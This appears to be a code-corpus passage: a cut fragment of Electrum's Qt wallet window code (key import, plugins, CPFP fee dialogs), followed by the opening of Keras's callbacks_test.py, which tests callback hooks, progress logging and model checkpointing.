import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses")+':' self._do_import(title, msg, self.wallet.import_addresses) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title = _('Import private keys') header_layout = QHBoxLayout() header_layout.addWidget(QLabel(_("Enter private keys")+':')) header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): from .settings_dialog import SettingsDialog d = SettingsDialog(self, self.config) self.alias_received_signal.connect(d.set_alias_color) d.exec_() self.alias_received_signal.disconnect(d.set_alias_color) if self.fx: self.fx.trigger_update() run_hook('close_settings_dialog') if d.need_restart: self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # It seems in some rare cases this closeEvent() is called twice if not self.cleaned_up: self.cleaned_up = True self.clean_up() event.accept() def clean_up(self): self.wallet.thread.stop() util.unregister_callback(self.on_network) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.db.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.wallet.db.put("qt-console-history", self.console.history[-50:]) if self.qr_window: self.qr_window.close() self.close_wallet() self.gui_object.timer.timeout.disconnect(self.timer_actions) self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int): widget = settings_widgets.get(name) # type: Optional[QWidget] if widget and not p: # plugin got disabled, rm widget grid.removeWidget(widget) widget.setParent(None) settings_widgets.pop(name) elif widget is None and p and p.requires_settings() and p.is_enabled(): # plugin got enabled, add widget widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) def do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) # note: all enabled plugins will receive this hook: run_hook('init_qt', self.gui_object) for i, descr in enumerate(plugins.descriptions.values()): full_name = descr['__name__'] prefix, _separator, name = full_name.rpartition('.') p = plugins.get(name) if descr.get('registers_keystore'): continue try: cb = QCheckBox(descr['fullname']) plugin_is_loaded = p is not None cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet) or plugin_is_loaded and p.can_user_disable()) cb.setEnabled(cb_enabled) cb.setChecked(plugin_is_loaded and p.is_enabled()) grid.addWidget(cb, i, 0) enable_settings_widget(p, name, i) cb.clicked.connect(partial(do_toggle, cb, name, i)) msg = descr['description'] if descr.get('requires'): msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires'))) grid.addWidget(HelpButton(msg), i, 2) except Exception: self.logger.exception(f"cannot display plugin {name}") grid.setRowStretch(len(plugins.descriptions.values()), 1) vbox.addLayout(Buttons(CloseButton(d))) d.exec_() def cpfp_dialog(self, parent_tx: Transaction) -> None: new_tx = self.wallet.cpfp(parent_tx, 0) total_size = parent_tx.estimated_size() + new_tx.estimated_size() parent_txid = parent_tx.txid() assert parent_txid parent_fee = self.wallet.get_tx_fee(parent_txid) if parent_fee is None: self.show_error(_("Can't CPFP: unknown fee for parent transaction.")) return d = WindowModalDialog(self, _('Child Pays for Parent')) vbox = QVBoxLayout(d) msg = ( "A CPFP is a transaction that sends an unconfirmed output back to " "yourself, with a high fee. The goal is to have miners confirm " "the parent transaction in order to get the fee attached to the " "child transaction.") vbox.addWidget(WWLabel(_(msg))) msg2 = ("The proposed fee is computed using your " "fee/kB settings, applied to the total size of both child and " "parent transactions. After you broadcast a CPFP transaction, " "it is normal to see a new unconfirmed transaction in your history.") vbox.addWidget(WWLabel(_(msg2))) grid = QGridLayout() grid.addWidget(QLabel(_('Total size') + ':'), 0, 0) grid.addWidget(QLabel('%d bytes'% total_size), 0, 1) max_fee = new_tx.output_value() grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0) grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1) output_amount = QLabel('') grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0) grid.addWidget(output_amount, 2, 1) fee_e = BTCAmountEdit(self.get_decimal_point) # FIXME with dyn fees, without estimates, there are all kinds of crashes here combined_fee = QLabel('') combined_feerate = QLabel('') def on_fee_edit(x): fee_for_child = fee_e.get_amount() if fee_for_child is None: return out_amt = max_fee - fee_for_child out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else '' output_amount.setText(out_amt_str) comb_fee = parent_fee + fee_for_child comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else '' combined_fee.setText(comb_fee_str) comb_feerate = comb_fee / total_size * 1000 comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else '' combined_feerate.setText(comb_feerate_str) fee_e.textChanged.connect(on_fee_edit) def get_child_fee_from_total_feerate(fee_per_kb): fee = fee_per_kb * total_size / 1000 - parent_fee fee = min(max_fee, fee) fee = max(total_size, fee) # pay at least 1 sat/byte for combined size return fee suggested_feerate = self.config.fee_per_kb() if suggested_feerate is None: self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''') return fee = get_child_fee_from_total_feerate(suggested_feerate) fee_e.setAmount(fee) grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0) grid.addWidget(fee_e, 3, 1) def on_rate(dyn, pos, fee_rate): fee = get_child_fee_from_total_feerate(fee_rate) fee_e.setAmount(fee) fee_slider = FeeSlider(self, self.config, on_rate) fee_combo = FeeComboBox(fee_slider) fee_slider.update() grid.addWidget(fee_slider, 4, 1) grid.addWidget(fee_combo, 4, 2) grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0) grid.addWidget(combined_fee, 5, 1) grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0) grid.addWidget(combined_feerate, 6, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return fee = fee_e.get_amount() if fee is None: return # fee left empty, treat is as "cancel" if fee > max_fee: self.show_error(_('Max fee exceeded')) return try: new_tx = self.wallet.cpfp(parent_tx, fee) except CannotCPFP as e: self.show_error(str(e)) return self.show_transaction(new_tx) def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool: """Returns whether successful.""" # note side-effect: tx is being mutated assert isinstance(tx, PartialTransaction) try: # note: this might download input utxos over network BlockingWaitingDialog( self, _("Adding info to tx, from wallet and network..."), lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False), ) except NetworkException as e: self.show_error(repr(e)) return False return True def bump_fee_dialog(self, tx: Transaction): txid = tx.txid() if not isinstance(tx, PartialTransaction): tx = PartialTransaction.from_tx(tx) if not self._add_info_to_tx_from_wallet_and_network(tx): return d = BumpFeeDialog(main_window=self, tx=tx, txid=txid) d.run() def dscancel_dialog(self, tx: Transaction): txid = tx.txid() if not isinstance(tx, PartialTransaction): tx = PartialTransaction.from_tx(tx) if not self._add_info_to_tx_from_wallet_and_network(tx): return d = DSCancelDialog(main_window=self, tx=tx, txid=txid) d.run() def save_transaction_into_wallet(self, tx: Transaction): win = self.top_level_window() try: if not self.wallet.add_transaction(tx): win.show_error(_("Transaction could not be saved.") + "\n" + _("It conflicts with current history.")) return False except AddTransactionException as e: win.show_error(e) return False else: self.wallet.save_db() # need to update at least: history_list, utxo_list, address_list self.need_update.set() msg = (_("Transaction added to wallet history.") + '\n\n' + _("Note: this is an offline transaction, if you want the network " "to see it, you need to broadcast it.")) win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg) return True def show_cert_mismatch_error(self): if self.showing_cert_mismatch_error: return self.showing_cert_mismatch_error = True self.show_critical(title=_("Certificate mismatch"), msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" + _("Electrum will now exit.")) self.showing_cert_mismatch_error = False self.close()
callbacks_test.py
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for Keras callbacks.""" import collections import csv import json import os import re import shutil import sys import threading import time import unittest from unittest import mock from absl.testing import parameterized import keras from keras.callbacks import BackupAndRestore from keras.callbacks import BackupAndRestoreExperimental from keras.engine import sequential from keras.layers import Activation from keras.layers import Dense from keras.optimizers.optimizer_v2 import gradient_descent from keras.optimizers.schedules import learning_rate_schedule from keras.testing_infra import test_combinations from keras.testing_infra import test_utils from keras.utils import io_utils from keras.utils import np_utils import numpy as np import tensorflow.compat.v2 as tf from tensorflow.python.platform import tf_logging as logging try: import h5py # pylint:disable=g-import-not-at-top except ImportError: h5py = None try: import requests # pylint:disable=g-import-not-at-top except ImportError: requests = None TRAIN_SAMPLES = 10 TEST_SAMPLES = 10 NUM_CLASSES = 2 INPUT_DIM = 3 NUM_HIDDEN = 5 BATCH_SIZE = 5 CALLBACK_HOOKS = [ 'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end', 'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin', 'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end', 'on_test_begin', 'on_test_end', 'on_train_batch_begin', 'on_train_batch_end', 'on_train_begin', 'on_train_end' ] class Counter(keras.callbacks.Callback): """Counts the number of times each callback method was run. Attributes: method_counts: dict. Contains the counts of time each callback method was run. """ def __init__(self): self.method_counts = collections.defaultdict(int) for method_name in CALLBACK_HOOKS: setattr(self, method_name, self.wrap_with_counts(method_name, getattr(self, method_name))) def wrap_with_counts(self, method_name, method): def _call_and_count(*args, **kwargs): self.method_counts[method_name] += 1 return method(*args, **kwargs) return _call_and_count class CallAllHooks(keras.callbacks.Callback): """A callback that calls self._run for all hooks""" def __init__(self): for method_name in CALLBACK_HOOKS: setattr(self, method_name, self._run) def _run(self, *args, logs=None): raise NotImplementedError def _get_numpy(): return np.ones((10, 10)), np.ones((10, 1)) def _get_sequence(): class MySequence(keras.utils.data_utils.Sequence): def __getitem__(self, _): return np.ones((2, 10)), np.ones((2, 1)) def __len__(self): return 5 return MySequence(), None @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes class CallbackCountsTest(test_combinations.TestCase): def _check_counts(self, counter, expected_counts): """Checks that the counts registered by `counter` are those expected.""" for method_name, expected_count in expected_counts.items(): self.assertEqual( counter.method_counts[method_name], expected_count, msg='For method {}: expected {}, got: {}'.format( method_name, expected_count, counter.method_counts[method_name])) def _get_model(self): layers = [ keras.layers.Dense(10, activation='relu'), keras.layers.Dense(1, activation='sigmoid') ] model = test_utils.get_model_from_layers(layers, input_shape=(10,)) model.compile( tf.compat.v1.train.AdamOptimizer(0.001), 'binary_crossentropy', run_eagerly=test_utils.should_run_eagerly()) return model @parameterized.named_parameters(('with_numpy', _get_numpy()), ('with_sequence', _get_sequence())) def test_callback_hooks_are_called_in_fit(self, data): if not tf.executing_eagerly(): self.skipTest('Behavior changed in v2.') x, y = data val_x, val_y = np.ones((4, 10)), np.ones((4, 1)) model = self._get_model() counter = Counter() model.fit( x, y, validation_data=(val_x, val_y), batch_size=2, steps_per_epoch=5, epochs=5, callbacks=[counter]) self._check_counts( counter, { 'on_batch_begin': 25, 'on_batch_end': 25, 'on_epoch_begin': 5, 'on_epoch_end': 5, 'on_predict_batch_begin': 0, 'on_predict_batch_end': 0, 'on_predict_begin': 0, 'on_predict_end': 0, 'on_test_batch_begin': 10, 'on_test_batch_end': 10, 'on_test_begin': 5, 'on_test_end': 5, 'on_train_batch_begin': 25, 'on_train_batch_end': 25, 'on_train_begin': 1, 'on_train_end': 1 }) @parameterized.named_parameters(('with_numpy', _get_numpy()), ('with_sequence', _get_sequence())) def test_callback_hooks_are_called_in_evaluate(self, data): x, y = data is_sequence = isinstance(x, keras.utils.data_utils.Sequence) model = self._get_model() counter = Counter() model.evaluate( x, y, batch_size=2 if not is_sequence else None, steps=5 if is_sequence else None, callbacks=[counter]) self._check_counts( counter, { 'on_test_batch_begin': 5, 'on_test_batch_end': 5, 'on_test_begin': 1, 'on_test_end': 1 }) @parameterized.named_parameters(('with_numpy', _get_numpy()), ('with_sequence', _get_sequence())) def test_callback_hooks_are_called_in_predict(self, data): x = data[0] is_sequence = isinstance(x, keras.utils.data_utils.Sequence) model = self._get_model() counter = Counter() model.predict( x, batch_size=2 if not is_sequence else None, steps=5 if is_sequence else None, callbacks=[counter]) self._check_counts( counter, { 'on_predict_batch_begin': 5, 'on_predict_batch_end': 5, 'on_predict_begin': 1, 'on_predict_end': 1 }) def test_callback_list_methods(self): counter = Counter() callback_list = keras.callbacks.CallbackList([counter]) batch = 0 callback_list.on_test_batch_begin(batch) callback_list.on_test_batch_end(batch) callback_list.on_predict_batch_begin(batch) callback_list.on_predict_batch_end(batch) self._check_counts( counter, { 'on_test_batch_begin': 1, 'on_test_batch_end': 1, 'on_predict_batch_begin': 1, 'on_predict_batch_end': 1 }) class KerasCallbacksTest(test_combinations.TestCase): def _get_model(self, input_shape=None, additional_metrics=None): additional_metrics = additional_metrics or [] layers = [ keras.layers.Dense(3, activation='relu'), keras.layers.Dense(2, activation='softmax') ] model = test_utils.get_model_from_layers(layers, input_shape=input_shape) model.compile( loss='mse', optimizer='rmsprop', metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')] + additional_metrics, run_eagerly=test_utils.should_run_eagerly()) return model @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes def test_progbar_logging(self): model = self._get_model(input_shape=(3,)) x = tf.ones((200, 3)) y = tf.zeros((200, 2)) dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10) expected_log = r'(.*- loss:.*- my_acc:.*)+' io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model.fit(dataset, epochs=2, steps_per_epoch=10) self.assertRegex(printed.contents(), expected_log) @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes def test_progbar_logging_with_stateful_metrics(self): class AddAllOnes(keras.metrics.Metric): """A simple metric that adds all the one's in `y_true`.""" def __init__(self, name='add_all_ones', **kwargs): super(AddAllOnes, self).__init__(name=name, **kwargs) self.total = self.add_weight(name='total', initializer='zeros') def update_state(self, y_true, y_pred, sample_weight=None): self.total.assign_add( tf.cast(tf.reduce_sum(y_true), dtype=tf.float32)) def result(self): return self.total x_train = np.array([[0, 1, 0, 1, 0, 1, 0, 1]] * 8).astype(float) y_train = np.array([[1, 0], [0, 0], [1, 1], [1, 0], [0, 1], [1, 0], [1, 0], [0, 0]]) # There are 7 ones in total in `y_train` after two batches. expected_log = r'(.*- loss:.*- my_acc:.*- add_all_ones: 7.0000)+' io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model = self._get_model( input_shape=(8,), additional_metrics=[AddAllOnes()]) model.fit(x_train, y_train, verbose=1, batch_size=4, shuffle=False) self.assertRegex(printed.contents(), expected_log) # When not executing eagerly, `model.evaluate` does not have the metrics # results printed. if tf.executing_eagerly(): with self.captureWritesToStream(sys.stdout) as printed: model = self._get_model( input_shape=(8,), additional_metrics=[AddAllOnes()]) model.evaluate(x_train, y_train, verbose=1, batch_size=4) self.assertRegex(printed.contents(), expected_log) @test_combinations.run_all_keras_modes def test_trivial_backup_restore(self): if test_utils.should_run_eagerly(): model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse') cbk = BackupAndRestore(self.get_temp_dir()) model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=0, callbacks=[cbk]) def test_backup_restore_train_counter(self): if not tf.compat.v1.executing_eagerly(): self.skipTest('BackupAndRestore only available when execution is enabled') model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse') cbk = BackupAndRestore(self.get_temp_dir()) class InterruptingCallback(keras.callbacks.Callback): """A callback to intentionally introduce interruption to training.""" def on_epoch_end(self, epoch, log=None): logging.info(f'counter: {model._train_counter}') if epoch == 5 or epoch == 12: raise RuntimeError('Interruption') log_dir = self.get_temp_dir() # The following asserts that the train counter is fault tolerant. self.assertEqual(model._train_counter.numpy(), 0) try: model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20, callbacks=[cbk, InterruptingCallback()]) except RuntimeError: pass self.assertEqual(model._train_counter.numpy(), 6) try: model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20, callbacks=[cbk, InterruptingCallback()]) except RuntimeError: pass self.assertEqual(model._train_counter.numpy(), 13) def _test_backup_and_restore_callback_with(self, cls): if not tf.compat.v1.executing_eagerly(): self.skipTest('BackupAndRestore only available when execution is enabled') class InterruptingCallback(keras.callbacks.Callback): """A callback to intentionally introduce interruption to training.""" def on_epoch_end(self, epoch, log=None): if epoch == 15: raise RuntimeError('Interruption') model = keras.Sequential([keras.layers.Dense(10)]) optimizer = gradient_descent.SGD() model.compile(optimizer, loss='mse') x = tf.random.uniform((24, 10)) y = tf.random.uniform((24,)) dataset = tf.data.Dataset.from_tensor_slices((x, y)).repeat().batch(2) backup_callback = cls(backup_dir=self.get_temp_dir()) try: model.fit( dataset, epochs=20, steps_per_epoch=5, callbacks=[backup_callback, InterruptingCallback()]) except RuntimeError: logging.warning('***Handling interruption***') # This continues at the epoch where it left off. model.fit( dataset, epochs=20, steps_per_epoch=5, callbacks=[backup_callback]) def test_experimental_backup_and_restore(self): """Ensure the legacy endpoint of `BackupAndRestore` gives warning.""" warning_messages = [] def warning(msg): warning_messages.append(msg) with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning): self._test_backup_and_restore_callback_with(BackupAndRestoreExperimental) warning_msg = ('`tf.keras.callbacks.experimental.BackupAndRestore` ' 'endpoint is deprecated') self.assertIn(warning_msg, '\n'.join(warning_messages)) warning_msg = ('***Handling interruption***') self.assertIn(warning_msg, '\n'.join(warning_messages)) def test_backup_and_restore(self): """Ensure the public endpoint of `BackupAndRestore` is working.""" warning_messages = [] def warning(msg): warning_messages.append(msg) with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning): self._test_backup_and_restore_callback_with(BackupAndRestore) warning_msg = ('`tf.keras.callbacks.experimental.BackupAndRestore` ' 'endpoint is deprecated') self.assertNotIn(warning_msg, '\n'.join(warning_messages)) warning_msg = ('***Handling interruption***') self.assertIn(warning_msg, '\n'.join(warning_messages)) @test_combinations.run_all_keras_modes def test_callback_warning(self): class SleepCallback(keras.callbacks.Callback): def on_train_batch_end(self, batch, logs=None): time.sleep(0.1) model = sequential.Sequential() model.add(keras.layers.Dense(1)) model.compile( 'sgd', loss='mse', run_eagerly=test_utils.should_run_eagerly()) warning_messages = [] def warning(msg): warning_messages.append(msg) with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning): model.fit( np.ones((16, 1), 'float32'), np.ones((16, 1), 'float32'), batch_size=3, epochs=1, callbacks=[SleepCallback()]) warning_msg = ('Callback method `on_train_batch_end` is slow compared ' 'to the batch time') self.assertIn(warning_msg, '\n'.join(warning_messages)) @test_combinations.run_all_keras_modes def test_default_callbacks_no_warning(self): # Test that without the callback no warning is raised model = sequential.Sequential() model.add(keras.layers.Dense(1)) model.compile( 'sgd', loss='mse', run_eagerly=test_utils.should_run_eagerly()) warning_messages = [] def warning(msg): warning_messages.append(msg) with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning): model.fit( np.ones((16, 1), 'float32'), np.ones((16, 1), 'float32'), batch_size=3, epochs=1) self.assertListEqual(warning_messages, []) @test_combinations.run_with_all_model_types(exclude_models='functional') @test_combinations.run_all_keras_modes def test_progbar_logging_deferred_model_build(self): model = self._get_model() self.assertFalse(model.built) x = tf.ones((200, 3)) y = tf.zeros((200, 2)) dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10) expected_log = r'(.*- loss:.*- my_acc:.*)+' io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model.fit(dataset, epochs=2, steps_per_epoch=10) self.assertRegex(printed.contents(), expected_log) @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes def test_progbar_logging_validation_data(self): model = self._get_model(input_shape=(3,)) x = tf.ones((50, 3)) y = tf.zeros((50, 2)) training_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10) val_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10) expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+' io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model.fit(training_dataset, epochs=2, validation_data=val_dataset) self.assertRegex(printed.contents(), expected_log) @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_progbar_logging_validation_split(self): model = self._get_model(input_shape=(3,)) x = np.ones((100, 3)) y = np.zeros((100, 2)) expected_log = ( r'(?s).*1/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:' r'.*2/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*') io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2) self.assertRegex(printed.contents(), expected_log) @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_progbar_logging_training_validation(self): model = self._get_model(input_shape=(2,)) def generator(): for _ in range(100): yield [1, 1], 1 training = tf.data.Dataset \ .from_generator( generator=generator, output_types=('float64', 'float64'), output_shapes=([2], [])) \ .batch(2) \ .repeat() validation = tf.data.Dataset \ .from_generator( generator=generator, output_types=('float64', 'float64'), output_shapes=([2], [])) \ .batch(2) expected_log = ( r'(?s).*1/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:' r'.*2/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*') io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model.fit( x=training, validation_data=validation, epochs=2, steps_per_epoch=20) self.assertRegex(printed.contents(), expected_log) @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_progbar_logging_with_dataset_and_partial_batch(self): model = self._get_model(input_shape=(2,)) def generator(): # Have a partial batch at the end. for _ in range(9): yield np.random.random(2), 1 training = tf.data.Dataset \ .from_generator( generator=generator, output_types=('float64', 'float64'), output_shapes=([2], [])) \ .batch(2) validation = tf.data.Dataset \ .from_generator( generator=generator, output_types=('float64', 'float64'), output_shapes=([2], [])) \ .batch(2) io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model.fit(x=training, validation_data=validation) # Make sure the value of val_ metrics are not zeros. log_content = printed.contents() val_loss = re.findall(r'val_loss: (\d\.\d+)', log_content) self.assertLen(val_loss, 1) self.assertGreater(float(val_loss[0]), 0.0) @test_combinations.run_with_all_model_types def test_ModelCheckpoint(self): if h5py is None: return # Skip test if models cannot be saved. model_type = test_utils.get_model_type() if model_type == 'subclass': return # Skip test since subclassed models cannot be saved in .h5 format. if not tf.__internal__.tf2.enabled(): self.skipTest('Checkpoint callback only available in v2.') layers = [ keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'), keras.layers.Dense(NUM_CLASSES, activation='softmax') ] model = test_utils.get_model_from_layers(layers, input_shape=(3,)) model.compile( loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc']) temp_dir = self.get_temp_dir() self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True) filepath = os.path.join(temp_dir, 'checkpoint.h5') (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) # Case 1 monitor = 'val_loss' save_best_only = False mode = 'auto' cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert os.path.exists(filepath) os.remove(filepath) # Case 2 mode = 'min' cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert os.path.exists(filepath) os.remove(filepath) # Case 3 mode = 'max' monitor = 'val_acc' cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert os.path.exists(filepath) os.remove(filepath) # Case 4 save_best_only = True cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert os.path.exists(filepath) os.remove(filepath) # Case 5: metric not available. cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor='unknown', save_best_only=True) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) # File won't be written. assert not os.path.exists(filepath) # Case 6 save_best_only = False period = 2 mode = 'auto' filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5') cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode, period=period) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=4, verbose=1) assert os.path.exists(filepath.format(epoch=2)) assert os.path.exists(filepath.format(epoch=4)) os.remove(filepath.format(epoch=2)) os.remove(filepath.format(epoch=4)) assert not os.path.exists(filepath.format(epoch=1)) assert not os.path.exists(filepath.format(epoch=3)) # Invalid use: this will raise a warning but not an Exception. keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode='unknown') # Case 7: `ModelCheckpoint` with a combination of `save_freq` and `period`. # Though `period` is deprecated, we're testing it for # backward-compatibility. filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5') cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5) ] assert not os.path.exists(filepath.format(epoch=0)) assert not os.path.exists(filepath.format(epoch=5)) model.fit( x_train, y_train, batch_size=2, validation_data=(x_test, y_test), callbacks=cbks, epochs=10, verbose=1) assert not os.path.exists(filepath.format(epoch=1)) assert not os.path.exists(filepath.format(epoch=2)) assert not os.path.exists(filepath.format(epoch=3)) assert not os.path.exists(filepath.format(epoch=4)) assert os.path.exists(filepath.format(epoch=5)) assert not os.path.exists(filepath.format(epoch=6)) assert os.path.exists(filepath.format(epoch=10)) os.remove(filepath.format(epoch=5)) os.remove(filepath.format(epoch=10)) # Case 8: `ModelCheckpoint` with an integer `save_freq` filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5') cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode, save_freq=15, period=100) # The period should be ignored (this test tests this). ] assert not os.path.exists(filepath.format(epoch=3)) model.fit( x_train, y_train, batch_size=2, validation_data=(x_test, y_test), callbacks=cbks, epochs=10, verbose=1) assert not os.path.exists(filepath.format(epoch=1)) assert not os.path.exists(filepath.format(epoch=2)) assert os.path.exists(filepath.format(epoch=3)) assert not os.path.exists(filepath.format(epoch=4)) assert not os.path.exists(filepath.format(epoch=5)) assert os.path.exists(filepath.format(epoch=6)) assert not os.path.exists(filepath.format(epoch=7)) assert not os.path.exists(filepath.format(epoch=8)) assert os.path.exists(filepath.format(epoch=9)) os.remove(filepath.format(epoch=3)) os.remove(filepath.format(epoch=6)) os.remove(filepath.format(epoch=9)) # Case 9: `ModelCheckpoint` with valid and invalid save_freq argument. with self.assertRaisesRegex(ValueError, 'Unrecognized save_freq'): keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode, save_freq='invalid_save_freq') # The following should not raise ValueError. keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode, save_freq='epoch') keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, mode=mode, save_freq=3) # Case 10: `ModelCheckpoint` with valid and invalid `options` argument. with self.assertRaisesRegex(TypeError, 'tf.train.CheckpointOptions'): keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, save_weights_only=True, mode=mode, options=tf.saved_model.SaveOptions()) with self.assertRaisesRegex(TypeError, 'tf.saved_model.SaveOptions'): keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, save_weights_only=False, mode=mode, options=tf.train.CheckpointOptions()) keras.callbacks.ModelCheckpoint( filepath, 